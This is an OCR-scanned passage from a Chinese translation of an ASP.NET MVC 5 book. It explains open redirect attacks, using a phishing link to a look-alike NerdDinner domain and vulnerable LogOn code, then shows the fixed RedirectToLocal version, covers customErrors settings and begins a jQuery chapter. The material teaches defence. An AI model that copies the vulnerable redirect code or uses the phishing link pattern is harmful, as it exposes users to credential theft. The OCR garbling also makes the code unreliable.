含 一 个 retumUrl 查 询 字符 串 ， 以 便 用 户 登录 成 功 后 返回 到 原来 请 求 的 URL 上 。 

从 图 7-18 中 可 以 看 出 ， 在 没有 登录 的 情况 下 ， 尝 试 访问 视图 /Account/ChangePassword， 
就 会 重 定向 到 /Account/LogOn?ReturnUrl=%2fAccount%2fChangePassword%2f 页 

由 于 没有 对 ReturnUrl 查 询 字 符 串 参数 进行 验证 ， 因 此 攻击 者 可 以 修改 这 个 参数 ， 从 而 向 
其 中 注入 任意 的 URL 地 址 来 实现 开放 重 定向 攻击 。 为 了 说 明 这 个 问题 ， 现 将 参数 ReturnUrl 的 
f 修改 为 g Et com， 所 以 最 终 登录 的 URL 是 mixed re http://www. 


站 点 。 


图 7-18 


2) 一 个 复杂 的 开放 重 定向 攻击 

因为 攻击 者 知道 用 户 要 登录 的 网 站 ， 这 使 得 用 户 很 容易 受到 钓鱼 攻击 (phishing attack), 
所 以 开放 重 定向 攻击 极其 危险 。 例 如 ， 攻 击 者 向 站 点 用 户 发 送 恶意 的 电子 邮件 试图 捕获 他 们 
的 密码 。 下 面 曾 述 这 种 攻击 是 如 何在 NerdDinner 站 点 上 运作 的 (注意 ; 目前 的 NerdDinner 已 经 
进行 了 更 新 ， 来 防御 开放 重 定向 攻击 )。 

首先 ， 攻 击 者 向 用 户 发 送 一 个 指向 NerdDinner 站 点 的 登录 页 面 链接 ， 其 中 包含 了 重 定向 


到 他 们 的 伪造 页 面 的 URI 链 接 : http://nerddinner.com/Account/LogOn?returnUrl= http://nerddiner. 


com/Account/LogOn. 
请 注意 返回 的 URL 指 向 nerddiner.com， 其 中 的 dinner 少 了 一 个 字母 n。 在 这 个 例子 中 ， 攻 
击 者 控制 着 nerddiner.com 域 。 当 访问 前 面 的 链接 时 , 就 会 链接 到 合法 的 NerdDinner.com 的 登录 
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页 面 ， 如 图 7-19 所 示 。 
99. Or EE 


LEULLJ 


—— 


minia inania liia DE 


Log On 
[via 3rd Party (recommended) using a NerdDinner account 
| OR | venane 
| YaHoo! Googe  d'o» Password 


E Remember me? 


Y you have logged in prevousy cick the same button 
you did last timo. Log on 

| Please enter your usemame and password. Register i 

| you dont have an account. 


Code by Hanselman. Gue, Galloway. Conery and Amott JavaScript by Dave Ward ASP NET MVC by Haack and rends Ste by Michael Dorian Bach. 
Source Code at hip merddiner codeplex com. Free Sample Book Chapter and code walithrough at hap Mturi comíaspnetmic- 


F @ Internet Protected Mode on DENT NE 


图 7-19 


当成 功 登录 后 ，ASPNET MVC 中 AccountController 控 制 器 的 LogOn 操 作 就 会 重 定 向 到 由 
returnUrl 查 询 字 符 串 参数 指定 的 URL 地 址 。 在 这 个 例子 中 ， 指 定 的 URL 是 由 攻击 者 输入 的 地 
址 http://nerddiner.com/Account/LogOn。 除非 非常 警惕 ,否则 很 难 察觉 到 这 是 伪造 的 登录 页 面 ， 
当 攻 击 者 非常 精心 地 设计 了 登录 页 面 ， 使 其 能 达到 以 假 乱 真 的 地 步 时 尤其 如 此 。 伪 造 的 登录 
页 面 会 包含 一 个 错误 消息 ， 它 要 求 用 户 重新 登录 ， 如 图 7-20 所 示 。 此 时 被 思 和 弄 的 用 户 可 能 还 


会 认为 自己 刚才 一 定 输 错 了 密码 。 


Login was unsuccessful. Please correct the errors and try again. 
O The username or password provided is incorrect. 


| via 3rd Party (recommended) | using a NerdDinner account 
| OR. [urs [ipie 


€aHoo! Googe dopen Password 
Kyou have logged in previously, cick the same button pid 
| you dd lastima. 加 Log On 
Please enter your usemame and password. Register f 
you dort have an account. 


Code by Hanselman, Gurie, Galloway, Conery and Amott JavaScript by Dave Ward ASP.NET MVC by Hzack and tends She by Michael Dorian Bach 
Source Code at tp merodinner codeplex com. Free Sample Book Chapter and code waltrough at ep Mnyur comaspnetmwe. 


5 4) internet | Protected Mode On fà Ros ~ 


图 7-20 
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当 用 户 重 新 输入 用 户 名 和 密码 后 ， 伪 造 的 登录 页 面 就 会 保存 这 些 信息 ， 并 重 定向 到 合法 
的 NerdDinnercom 站 点 。 这 时 ，NerdDinner com 站 点 已 经 进行 了 验证 ， 所 以 伪造 的 登录 页 面 可 
以 直接 重 定向 到 NerdDinner 站 点 首页 。 最 终 的 结果 是 ， 攻 击 者 拥有 用 户 的 用 户 名 和 密码 ， 而 
用 户 却 不 知道 自己 已 经 把 这 些 信 息 提供 给 他 们 了 。 


3) AccountController 控 制 器 中 操作 LogOn 的 脆弱 代码 
下 面 的 代码 展示 了 MVC 2 应 用 程序 中 的 LogOn 操 作 。 注 意 一 旦 成 功 登 录 ， 控 制 器 就 返回 
一 个 重 定 向 到 的 retumUrl。 从 下 面 的 代码 中 可 以 看 出 没有 对 returmUrl 参 数 进行 任何 验证 。 


[HttpPost] 
public ActionResult LogOn(LogOnModel model, string returnUrl) 
t 

if (ModelState.IsValid) 

t 


if (MembershipService.ValidateUser (model.UserName, model.Password)) 
t 
FormsService.SignIn(model.UserName, model.RememberMe); 
if (!String.IsNullOrEmpty (returnUrl) 
t 
return Redirect (returnUrl); 
? 
else 
{ 
return RedirectToAction("Index", "Home"); 
) 
) 
else 
t 
ModelState.AddModelError ("", 
"The user name or password provided is incorrect."); 


) 


// If we got this far, something failed, redisplay form 
return View (model); 


) 


下 面 修改 了 MVC 5 应 用 程序 中 的 Login 操 作 。 显而易见 , 下 面 代 码 调用 了 Redirect- ToLocal 
函数 ， 这 样 转 而 可 以 对 returnUrl 参 数 进行 验证 ， 只 需要 调用 名 为 IsLocalUrl() 的 方法 ， 该 方法 
位 于 System.Web.Mvc.Url 辅 助 类 中 ， 代 码 如 下 : 


[HttpPost] 
[AllowAnonymous] 
[ValidateAntiForgeryToken] 


public async Task<ActionResult> Login (LoginViewModel model, string returnUrl) 
t 


if (ModelState.IsValid) 
{ 
var user = await UserManager.FindAsync( 
model.UserName, model.Password); 
if (user !- null) 
t 
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await SignInAsync(user, model.RememberMe); 
return RedirectToLocal (returnUrl); 


else 


ModelState.AddModelError("", 
"Invalid username or password."); 


// If we got this far, something failed, redisplay form 
return View (model); 
) 


2. 当 检 测 到 开放 重 定向 攻击 时 采取 的 额外 措施 


AccountController 的 开放 重 定 向 检查 会 阻止 攻击 ， 但 是 不 会 通知 我 们 或 者 用 户 发 生 了 这 
种 攻击 。 当 检测 到 开放 重 定向 攻击 时 , 可 以 采取 其 他 一 些 额 外 措施 ,例如 , 使 用 免费 的 ELMAH 
日 志 库 把 检测 到 的 开放 重 定向 攻击 作为 安全 异常 记录 下 来 ， 并 显示 一 条 自 定义 的 登录 消息 ， 
告知 用 户 他 们 已 经 被 记录 ， 但 他 们 点 击 的 登录 链接 可 能 是 恶意 的 。 在 MVC 4 或 MVC 5 应 用 程 
序 中 ， 我 们 在 AccountController RedirectToLocal 方 法 中 处 理 额外 的 日 志 : 


private ActionResult RedirectToLocal(string returnUrl) 
t 
if (Url.IsLocalUrl (returnUrl)) 
t 
return Redirect (returnUrl); 
} 
else 
t 
// Actions on for detected open redirect go here. 
string message - string.Format( 
"Open redirect to to (0) detected.", returnUrl); 
ErrorSignal.FromCurrentContext ().Raise( 
new System.Security.SecurityException (message)); 
return RedirectToAction("SecurityWarning", "Home"); 
} 
£ 


3. 开放 重 定向 小 结 
我 们 把 重 定向 URL 作 为 参数 在 应 用 程序 的 URL 中 传递 ， 很 可 能 会 导致 开放 重 定向 攻击 。 
MVC 1 和 MVC 2 模板 应 用 程序 极 易 受 到 这 种 攻击 ， 可 作为 演示 其 威胁 的 好 方法 。MVC 3 及 更 


高 版 本 会 在 AccountController 中 检查 开放 重 定向 。 我 们 既 可 以 学 习 这 种 检查 的 实现 方法 , 又 可 
以 利用 UrlIsLocalUrl 方 法 ， 因 为 该 方法 正 是 为 此 目的 添加 的 。 


7.7 适当 的 错误 报告 和 堆栈 跟踪 


几乎 所 有 网 站 在 开发 过 程 中 都 在 web.config 文 件 中 设置 了 特性 <customErrors mode- 
"ofP'>。 虽 然 这 一 设置 并 不 专用 于 ASPNET MVC， 但 是 因为 经 常 这 样 设置 ， 所 以 很 值得 在 安 
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全 性 的 章节 中 提出 来 。 

customErrors 模 式 有 3 个 可 选 设置 项 ， 分 别 是 : 

e On: 服务 器 开发 的 最 安全 选项 ， 因 为 它 总 是 隐藏 错误 提示 消息 。 

© RemoteOnly: 向 大 多 数 用 户 展示 一 般 的 错误 提示 消息 , 但 向 拥有 服务 器 访问 权限 的 用 

户 展示 完整 的 错误 提示 消息 。 

e Off: 最 容易 受到 攻击 的 选项 ， 它 向 访问 网 站 的 每 个 用 户 展示 详细 的 错误 提示 消息 。 

详细 的 错误 提示 消息 可 能 会 暴露 应 用 程序 的 内 部 结构 。 攻 击 者 如 果 了 解 了 程序 的 内 部 结 
构 ， 再 对 程序 进行 攻击 就 轻而易举 了 。 因 此 为 了 获取 详细 的 错误 提示 消息 ， 黑 客 会 想方设法 
让 网 站 出 现 错误 ， 比 如 他 可 能 使 用 格式 错误 的 URL 向 控制 器 发 送 损坏 的 信息 ， 或 者 扭曲 查询 
字符 串 ， 当 需要 发 送 一 个 整 型 数值 时 ， 却 向 服务 器 发 送 一 个 字符 串 。 

当 排除 服务 器 上 的 故障 时 ， 和 暂时 地 关闭 Custom Errors 特 性 会 很 有 诱惑 ， 但 是 禁用 了 
Customs Errors( 即 mode="off') 之 后 ， 当 再 出 现 异 常 时 ，ASPNET 运 行 时 就 会 向 访问 网 站 的 每 
个 用 户 展 示 详 细 的 错误 提示 消息 ， 而 详细 的 错误 提示 消息 中 包含 了 出 错 地 方 的 源 代 码 。 如 果 
此 时 有 人 对 网 站 有 不 良 企图 ， 就 会 趁机 大 量 窃取 程序 源 代 码 并 查找 其 中 的 潜在 漏洞 ， 然 后 利 
用 这 些 漏洞 窃取 数据 或 者 关闭 应 用 程序 。 

这 个 问题 的 根源 在 于 事件 出 现 之 后 才 去 考虑 错误 处 理 的 问题 ， 因 此 ， 显 而 易 见 ， 解 决 这 
个 问题 的 方法 就 是 先发制人 ， 也 就 是 在 突 发 事件 出 现 之 前 考虑 错误 处 理 。 


7.7.1 使 用 配置 转换 


如 果 想 在 其 他 服务 器 (如 在 一 个 阶段 或 测试 环境 ) 上 也 能 得 到 详细 的 错误 提示 消息 ， 那 么 
推荐 在 构建 配置 的 基础 上 使 用 web.config 转 换 来 管理 customErrors 设 置 。 当 创建 一 个 新 的 
ASPNET MVC 4 应 用 程序 时 ， 它 会 默认 为 调试 和 发 布 配置 设置 配置 转换 ， 并 且 还 可 以 很 容易 
地 为 其 他 环境 添加 额外 转换 。ASPNET MVC. 应 用 程序 中 包含 的 Web.Release. config 转 换文 件 
中 含有 如 下 代码 : 


<system.web> 

«compilation xdt:Transform-"RemoveAttributes (debug)" /> 

elec 
In the example below, the "Replace" transform will replace the entire 
«customErrors» section of your web.config file. 
Note that because there is only one customErrors section under the 
«system.web» node, there is no need to use the "xdt:Locator" attribute. 


«customErrors defaultRedirect-"GenericError.htm" 
mode-"RemoteOnly" xdt:Transform-"Replace"» 
«error statusCode-"500" redirect-"InternalError.htm"/» 
«/customErrors» 
mad 
«/system.web» 


当 在 Release 模 式 下 构建 应 用 程序 时 ， 上 面 转换 中 注释 掉 的 配置 代码 可 以 用 RemoteOnly 模 式 
替换 customErrors 模 式 。 开 启 该 配置 转换 只 需要 取消 注释 customErors 节 点 ， 代 码 如 下 所 示 : 


«system.web» 
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«compilation xdt:Transform-"RemoveAttributes (debug)" /> 

rd d 
In the example below, the "Replace" transform will replace the entire 
«customErrors» section of your web.config file. 
Note that because there is only one customErrors section under the 
«system.web» node, there is no need to use the "xdt:Locator" attribute. 


«customErrors defaultRedirect-"GenericError.htm" 
mode-"RemoteOnly" xdt:Transform-"Replace"» 
«error statusCode-"500" redirect-"InternalError.htm"/» 
«/customErrors» 


«/system.web» 


7.7.2 在 生产 环境 中 使 用 Retail 部 署 配置 


这 种 方法 不 是 胡乱 编辑 各 个 配置 设置 ， 而 是 利用 了 ASPNET 特 性 : Retail 部 署 配置 。 但 是 
这 一 特性 没有 得 到 充分 利用 。 

部 署 配置 是 服务 器 的 machine.config 文 件 (在 %windir%\Microsoft.NET\Framework\ 
<frameworkversion>\Config 目 录 下 ) 中 的 一 个 简单 开关 ， 用 来 标识 ASPNET 是 否 在 Retail 部 署 模 
式 下 运行 。 该 部 署 配 置 有 两 个 设置 : retail 要 么 是 true 要 么 是 false。deployment/retail 的 默认 值 是 
false; 可 以 用 下 面 的 配置 方法 将 其 设置 为 rue: 

<system.web> 

<deployment retail="true" /> 

</system.web> 

将 deployment/retail 设 置 为 tue， 将 会 影响 以 下 几 项 设置 

e customErrors 模式 被 设置 为 On， 也 就 是 最 安全 的 设置 。 

e 禁用 跟踪 输出 。 

e 禁用 调试 。 

这 些 设置 可 以 覆盖 web.config 文 件 中 所 有 应 用 程序 级 别 的 设置 。 


7.7.3 ”使 用 专门 的 错误 日 志 系统 


事实 上 ， 最 好 的 解决 方法 是 在 任何 环境 中 都 不 关闭 自 定 义 错 误 。 笔 者 推荐 使 用 专门 的 错 
误 日 志 记录 系统 ， 如 ELMAH( 本 章 前 面部 分 曾 提 及 ， 第 17 章 还 将 介绍 )。ELMAH 是 一 个 免费 
库 ， 可 以 通过 NuGet 获 得 ， 它 提供 了 多 种 查看 错误 信息 的 安全 方法 。 例 如 ， 可 以 利用 ELMAH 
把 错误 信息 写 入 到 一 个 不 在 网 站 上 公布 的 数据 库 表 中 。 

想 更 多 地 了 解 如 何 配置 和 使 用 ELMAH， 可 登录 以 下 网 址 : http:/code.google.compy/elmahy/。 


7.8 安全 回顾 和 有 用 资源 


表 7-1 回 顾 了 常见 的 一 些 网 络 安全 威胁 及 其 解决 方法 。 
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表 7-1 ASP.NET 安 全 威胁 及 解决 方法 


A W 


自满 | 自我 训练 。 假 设 应 用 程序 将 被 黑客 攻击 。 记 住 : 保护 好 用 户 的 数据 最 重要 


跨 站 脚本 攻击 (XSS) | 使 用 HTML 编码 所 有 内 容 。 编 码 特性 。 记 住 JavaScript 编 码 。 使 用 AntiXSS 类 


跨 站 请 求 伪 造 (CSRF) 令 牌 验证 。 鹤 等 的 GET 请 求 。HttpReferrer 验 证 


使 用 Bind 特 性 显 式 地 绑 定 白 名 单字 段 。 说 慎 使 用 黑 名 单 


ASPNET MVC 框 架 提供 了 保护 网 站 安全 的 多 种 工具 ， 但 是 如 何 利用 这 些 工具 取决 于 个 
人 。 真 正 的 安全 需要 持续 不 断 的 努力 ， 来 监控 和 应 对 不 断 变化 的 威胁 。 这 是 我 们 的 责任 ， 但 
我 们 并 非 孤军 作战 , 因为 在 Microsoft Web 开 发 领域 和 因特网 安全 领域 里 有 很 多 高 质量 的 资源 。 


表 7-2 列 出 了 常用 的 一 些 资源 : 


资源 名 称 
Microsoft 安 全 开发 中 心 


为 9787302263746) 


表 7-2 ”安全 资源 
URL 
http://msdn.microsoft.com/en-us/security/default.aspx 


RP: 《ASP.NET 安 全 编程 入 门 经 典 》 http://www.tupwk.com.cn/downpage 
(由 清华 大 学 出 版 社 引 进 并 出 版 ，ISBN 


免费 电子 书 : OWASP Top 10 for .NET | | http//www.troyhunt.com/2010/05/owasp-top-10-for-net-devel- 


Developers 


Microsoft Code Analysis Tool .NET 


(CAT.NET) 


AntiXSS 


opers-part-1.html 
http://www.microsoft.com/downloads/details 
.aspx?FamilyId-0178e2ef-9da8-445e-9348- 
c93f24cc9f9d&displaylang-en 
http://antixss.codeplex.com/ 


Microsoft 信 息 安全 开发 团队 (AntiXSS 和 | | http;//blogs.msdn.com/securitytools 


CAT.NET 的 开发 团队 ) 


开放 式 Web 应 用 程序 安全 项 目 (OWASP) | http//www.owasp.org/ 


7.9 小 结 


本 章 以 这 样 的 方式 开始 ， 也 应 该 适合 以 这 样 的 方式 结束 : ASPNET MVC 提 供 了 大 量 的 
控制 ， 并 且 同 时 删除 了 开发 人 员 认 为 是 障碍 的 大 部 分 抽象 。 自 由 越 多 ， 能 力 越 大 ， 相 应 地 ， 
能 力 越 大 ， 承 担 的 责任 也 就 越 多 。 

Microsoft 公 司 致力 于 帮助 我 们 “ 吃 一 第 ， 长 一 智 ” 也 就 是 说 ，ASPNET MVC 团 队 希 望 
我 们 能 够 简单 清楚 地 做 正确 的 事情 。 然 而 并 非 每 个 人 的 想法 都 一 样 ， 因 此 ， 毫 无 疑问 的 存在 
下 面 的 情况 : ASPNET MVC 团 队 决定 采用 的 框架 可 能 与 我 们 通常 使 用 的 方式 不 一 致 。 幸 好 ， 


当 这 种 情况 发 生 时 , 我 们 可 以 使 有 


自己 的 方式 来 实现 , 这 也 正 是 ASPNET MVC 框 架 主 则 所 在 。 


保证 应 用 程序 的 安全 性 不 是 一 路 而 就 的 ， 只 有 单方 面 考虑 是 不 够 的 ， 而 应 该 把 安全 性 问 
题 放 在 应 用 程序 的 整个 开发 过 程 中 以 及 应 用 程序 的 所 有 组 件 中 来 考虑 。 如 果 应 用 程序 允许 
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SQL 注入 攻击 ， 那 么 对 数据 库 进行 再 好 的 防御 也 不 能 保障 数据 库 的 安全 性 ; 如果 攻击 者 能 够 
利用 像 开 放 重 定向 一 样 的 攻击 手段 哄骗 用 户 交 出 密码 ， 那 么 严格 的 用 户 管理 就 会 士 衣 瓦解 。 
计算 机 安全 专家 推荐 使 用 一 个 称 为 深层 防御 (defense in depth) 的 策略 来 应 对 广泛 攻击 , 这 个 术 
语 起 源 于 军事 战略 ， 它 依托 于 分 层 的 防守 。 采 用 这 种 策略 ， 即 便 某 个 安全 区 域 受 到 攻击 ， 整 
个 系统 也 不 会 受到 拖累 。 

Web 应 用 程序 中 的 安全 问题 总 是 可 以 归结 为 开发 人 员 一 方 的 简单 问题 : 不 当 的 假设 、 错 
误 信息 及 缺乏 训练 等 。 本 章 竭尽 所 能 地 介绍 了 攻击 者 的 攻击 方式 ， 以 便 开发 人 员 对 它们 有 更 
BTA TAZ: “ACAM, ARTI”, 因此 保护 自己 的 最 好 方式 就 是 了 解 敌人 ， 了 解 
Ba. 


第 [a 


Ajax 


本 章 主 要 内 容 

e 理解 jQuery 技术 

e Ajax 辅助 方法 的 用 法 

o 理解 客户 端 验证 

o jQuery 插件 的 用 法 

e 提升 Ajax 性 能 

本 章 代码 下 载 : 

在 以 下 网 址 的 Download Code 选 项 卡 中 ， 可 找到 本 章 的 代码 下 载 : 
http://www.wrox.com/go/proaspnetmvc5。 本 章 的 代码 包含 在 以 下 文件 中 : 

e MvecMusicStore.C08.ActionLink 

e MvcMusicStore.C08.AjaxForm 

® MvcMusicStore.C08.Autocomplete 

e MvcMusicStore.C08.CustomClientValidation 

e MvcMusicStore.C08.jQuery 

e MvcMusicStore.C08.Templates 


现在 创建 的 Web 应 用 程序 几乎 都 要 用 到 Ajax 技术 .。 从 技术 角度 看 , Ajax 代表 异步 JavaScript 
和 XML(Asynchronous JavaScript and XML，Ajax)。 在 实际 应 用 中 ， 它 代表 在 构建 有 具有 良好 用 
户 体验 的 响应 性 Web 应 用 程序 时 用 到 的 所 有 技术 。 尽 管 响应 程序 有 时 需要 一 些 异 步 通 信 ， 但 
是 微妙 的 动画 和 颜色 变化 更 可 以 使 程序 具有 响应 性 。 如 果 我 们 能 够 直观 地 帮助 用 户 在 程序 内 
部 做 出 正确 的 选择 ， 那 么 他 们 就 会 经 常 光顾 我 们 的 网 站 。 

ASPNET MVC 5 是 一 个 现代 Web 框 架 ， 并 且 与 其 他 现代 Web 框 架 一 样 ， 它 从 一 开始 就 支 
持 Ajax 技术 .Ajax 支持 的 核心 来 自 于 开源 的 JavaScript 库 jQuery。.ASPNETMVC 5 中 主要 的 Ajax 
特性 要 么 是 基于 jQuery 构建 ， 要 么 是 扩展 的 jQuery 特性 。 
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要 理解 ASPNET MVC 5 框架 中 Ajax 的 用 途 ， 首 先 需要 学 习 jQuery。 
8.1 jQuery 


jQuery 的 口号 是 “ 少 写 ， 多 做 ”， 该 口号 完美 地 描述 了 jQuery 的 特点 。jQuery 的 API 简 洁 而 
强大 ,类 库 灵 活 而 轻便 。 最 重要 的 是 ,jQuery 不 仅 支 持 所 有 现代 浏览 器 , HIE, Firefox. Safari, 
Opera 和 Chrome 等 ， 还 可 以 在 编写 代码 和 浏览 器 API 冲 突 时 隐藏 不 一 致 性 (和 错误 )。 同 时 ,使 用 
jQuery 进行 开发 不 仅 可 以 减少 代码 的 编写 量 ， 节 省 开发 时 间 ， 而 且 还 不 用 太 费 脑筋 。 

jQuery 是 一 个 开源 项 目 , 是 目前 最 流行 的 JavaScript 库 之 一 。 在 jquery.com 网 站 上 能 够 找到 
它 的 最 新 下 载 版 本 、 文 档 和 插件 。 在 ASPNET MVC 应 用 程序 中 也 能 够 看 到 jQuery 的 身影 。 
Microsoft 支 持 jQuery， 当 创建 新 的 MVC 项 目 时 ，ASPNET MVC 的 项 目 模板 就 会 把 jQuery 用 型 
的 所 有 文件 放 在 Scripts 文 件 夹 中 。 在 MVC 5 中 ， 我 们 通过 NuGet 添 加 jQuery 脚本 ， 这 样 当 出 现 
新 版 本 的 jQuery 时 ， 我 们 就 可 以 很 容易 升级 脚本 。 

本 章 将 讲 到 , MVC 框 架 的 特性 是 建立 在 jQuery 基础 之 上 , 例如 客户 端 验证 和 异步 回 传 等 。 
在 深入 介绍 这 些 ASPNET MVC 特 性 之 前 ， 先 快速 浏览 一 下 jQuery 的 基本 特性 。 


8.1.1 jQuery 的 特性 


jQuery 擅长 在 HTMI 文 档 中 查找 、 遍 历 和 操纵 HTML 元素。 一 旦 找到 元 素 ，jQuery 就 可 以 
方便 地 在 其 上 进行 操作 ， 如 连接 事件 处 理 程序 、 使 其 具有 动画 效果 以 及 创建 围绕 它 的 Ajax 交 
互 等 。 本 节 后 面 将 详细 介绍 jQuery 的 这 些 功能 特性 ， 下 面 首先 讨论 jQuery 功能 的 入 口 : jQuery 
函数 。 


1. jQuery 函数 


jQuery 函数 对 象 可 以 用 来 访问 jQuery 特性 。 当 首次 使 用 jQuery 函数 时 ， 可 能 会 感到 困惑 。 
部 分 原因 可 能 是 这 个 称 为 jQuery 的 函数 用 $ 符 号 作为 别名 (因为 8 符号 只 需要 较 少 的 输入 ， 它 在 
JavaScript 语 法 中 是 一 个 合法 的 函数 名 )。 更 令 人 困惑 的 是 我 们 几乎 可 以 向 $ 函 数 传递 任何 类 型 
的 参数 ， 并 且 该 函数 还 能 够 推导 出 传递 这 个 参数 的 意图 。 下 面 的 代码 展示 了 jQuery 函数 的 一 
些 典型 应 用 : 
$(function () ( 
$("falbum-list img").mouseover(function () ( 


$(this).animate(( height: '+=25', width: '4-25' }) 
.animate(( height: '--25', width: '--25' ]); 


nD; 
DE 


第 一 行 代码 调用 了 jQuery 函数 ($)， 并 向 其 中 传递 了 一 个 匿名 的 JavaScript 函 数 作为 第 一 个 
参数 : 


$(function () ( 


$("falbum-list img").mouseover(function () { 
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$(this).animate(( height: '4-25', width: '4-25' }) 
.animate(( height: '--25', width: '--25' ]); 
n; 
ps 
当 传递 一 个 函数 作为 第 一 个 参数 时 ,jQuery 就 会 假定 这 个 函数 是 要 在 浏览 器 完成 构建 (由 
服务 器 提供 的 )HMTI 页 面 中 的 文档 对 象 模型 (Document Object Model，DOMD) 后 立即 执行 ， 换 
旬 话 说 ， 这 个 函数 在 从 服务 器 加 载 完 HTML 页 面 之 后 执行 。 这 样 就 可 以 安全 地 执行 函数 中 与 
DOM 冲 突 的 脚本 ， 我 们 把 这 种 情况 称 为 “DOM 准备 ”事件 。 
第 二 行 代码 向 jQuery 函数 传递 一 个 字符 串 "#albumr-list img": 


$(function () ( 
$("#album-list img").mouseover(function () ( 


$(this).animate(( height: '«-25', width: '+=25' ]) 
.animate(( height: '--25', width: '--25' ]); 
n; 
); 


jQuery 把 这 个 字符 串 解释 为 选择 器 。 选 择 器 会 告知 jQuery 需要 在 DOM 中 查找 的 元 素 。 我 们 
可 以 使 用 像 类 名 和 相对 位 置 这 样 的 特性 值 来 查找 元 素 。 第 二 行 代码 中 的 选择 器 告知 jQuery 查 
找 id 值 为 "album-list" 的 元 素 中 的 所 有 图 像 。 

当 执 行 选择 器 时 ， 它 会 返回 一 个 包含 零 个 或 多 个 匹配 元 素 的 封装 集 (wrapped set). Jeff] 
可 以 调用 其 他 任何 jQuery 方法 来 操作 封装 集中 的 元 素 。 例如， 上面 的 代码 调用 mouseover 方 法 
为 与 选择 器 匹配 的 每 个 图 像 元 素 的 onmouseover 事 件 连接 处 理 程序 。 

jQuery 利用 JavaScript 的 函数 式 编程 特性 ， 经 常 把 创建 的 或 传递 的 函数 作为 jQuery 方法 的 
参数 。 例 如 ，mouseover 方 法 知道 在 不 用 考虑 所 使 用 浏览 器 的 版 本 的 情况 下 ， 如 何 为 
onmouseover 事 件 连 接 事件 处 理 程序 , 但 是 它 不 知道 在 事件 触发 时 程序 员 想 要 执行 的 操作 。 于 
是 为 了 表达 事件 触发 时 想 进行 的 处 理 , 就 向 mouseover 方 法 传递 了 一 个 包含 事件 处 理 代码 的 函 
数 参数 : 

$(function () t 

$("falbum-list img").mouseover(function () ( 


$(this).animate(( height: '4-25', width: '4-25' }) 
.animate(( height: '--25', width: '--25' }); 


E 
DE 


上 面 的 例子 实现 了 在 触发 mouseover 事 件 时 ， 匹 配 选 择 器 的 img 元 素 会 产生 动画 效果 。 在 
上 面 代码 中 ， 之 所 以 使 用 this 关 键 字 来 引用 要 做 动画 效果 的 元 素 ， 是 因为 this 指 向 的 是 触发 事 
件 的 元 素 。 注 意 代 码 第 一 次 将 元 素 传递 给 jQuery 函数 的 方法 (S(this))。jQuery 将 该 参数 看 成 一 
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个 元 素 的 引用 参数 ， 并 返回 一 个 包含 有 该 元 素 的 封装 集 。 

一 旦 将 某 个 元 素 包 含 在 jQuery 封装 集中 , 就 可 以 调用 jQuery 方法 (如 animate) 来 操纵 这 个 元 
素 ,示例 中 的 代码 首先 将 图 像 放大 ( 宽 和 高 增加 25 个 像素 ), 然后 再 缩小 ( 宽 和 高 减 小 25 个 像素 )。 

上 述 代 码 的 执行 效果 是 : 当 用 户 将 鼠标 移 向 专辑 图 像 时 ， 他 们 会 看 到 图 像 先 变 大 再 变 小 
这 样 一 个 微妙 的 强调 效果 。 这 个 效果 是 应 用 程序 必需 的 吗 ? 不 是 ! 然而 ， 它 却 可 以 展示 一 个 
精美 优雅 的 外 观 。 用 户 定 会 喜欢 。 

随 着 本 章 的 进展 ， 会 看 到 越 来 越 多 的 特性 。 下 面 首先 详细 介绍 将 要 用 到 的 jQuery 特性 。 


2. jQuery 选择 器 


选择 器 是 指 传递 给 jQuery 函数 的 、 用 来 在 DOM 中 选择 元 素 的 字符 串 。 前 面 用 到 的 字符 串 
"Halbum-list img" 就 是 用 来 选择 <img> 标 签 的 。 作 为 选择 器 的 字符 串 看 起 来 像 层 琶 样式 表 
(Cascading Style Sheet，CSS) 中 的 项 。jQuery 选 择 器 的 语法 正 是 派生 于 CSS 3.0 选 择 器 的 语法 ， 
并 在 其 基础 上 做 了 一 些 补充 。 表 8-1 列 举 了 jQuery 代码 中 一 些 常见 的 选择 器 。 


表 8-1 常见 的 选择 器 


95 T *& X 
S("fI header") 查找 id 值 为 "header" 的 元 素 
S(".editor-label") 查找 class 名 为 ".editor-label" 的 所 有 元 素 
S("div") 查找 所 有 <div> 元 素 
$("#header div") 查找 id 值 为 "header" 元 素 的 所 有 后 代 <div> 元 素 
$("#header > div") 查找 id 值 为 "header" 元 素 的 所 有 子 <div> 元 素 
$("a:even") 查找 编号 为 偶数 的 锚 标 签 


从 表 8-1 的 最 后 一 行 可 以 看 出 ，jQuery 与 CSS 一 样 也 支持 伪 类 。 伪 类 既 可 以 用 来 选择 偶数 
或 奇数 编号 的 元 素 ， 也 可 以 用 来 选择 访问 过 的 链接 等 。 如 果 想 查看 整个 CSS 选 择 器 列表 ， 请 
访问 http://www.w3.org/TR/css3-selectors/。 


3. jQuery 事件 


jQuery 的 另 一 个 优势 在 于 ， 它 提供 了 用 来 订阅 DOM 中 事件 的 API。 尽 管 使 用 一 个 通用 的 
on 方法 可 以 捕获 指定 名 称 的 任何 事件 ， 但 jQuery 也 为 一 般 的 事件 提供 了 专门 方法 ， 比 如 click、 
blur 和 submit。 


© 注意 jQuery 的 on 方法 (以 及 对 应 的 of 方法 ， 用 于 取消 订阅 事件 ) 是 在 jQuery 1.7 

中 引入 的 ， 用 于 为 事件 绑 定 提供 一 个 统一 的 API。 on 方法 取代 了 原来 的 bind、live 
和 delegate 方 法 ; 事实 上 ， 如 果 查 看 源 代码 ， 可 看 到 bind、live 和 delegate 方 法 只 是 
将 调用 传递 给 了 on 方法 。 


像 之 前 提 过 的 那样 ， 可 以 通过 传 进 一 个 函数 来 告知 jQuery 在 事件 触发 时 进行 的 处 理 。 传 
进 的 函数 可 以 是 匿名 的 ， 像 本 节 前 面 的 “jQuery 函数 ”中 的 例子 ， 也 可 以 是 一 个 作为 事件 处 
理 程序 的 命名 函数 ， 如 以 下 代码 所 示 : 
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$("falbum-list img").mouseover(function () { 
animateElement ($ (this) ) ; 


n; 


function animateElement (element) ( 


element 


) 
一 且 选 择 了 


.animate(( height: '4-25', width: '4-25' }) 


.animate(( height: '--25', width: '--25' ]); 


一 些 DOM 元 素 或 是 在 一 个 事件 处 理 程序 内 , jQuery 就 可 以 很 容易 地 操纵 页 面 


上 的 元 素 ， 读 取 或 设置 它们 的 特性 值 ， 添 加 或 移 除 它们 的 CSS 类 等 。 下 面 的 代码 演示 了 当 用 
户 的 鼠标 移 过 元 素 时 , 如何 向 一 个 页 面 上 的 锚 标 签 添 加 或 从 中 删除 highlight 类 。 当 用 户 在 标签 
上 移动 鼠标 时 ， 锚 标签 就 会 改变 外 观 (假如 有 一 个 合适 的 highlight 样 式 设置 ): 


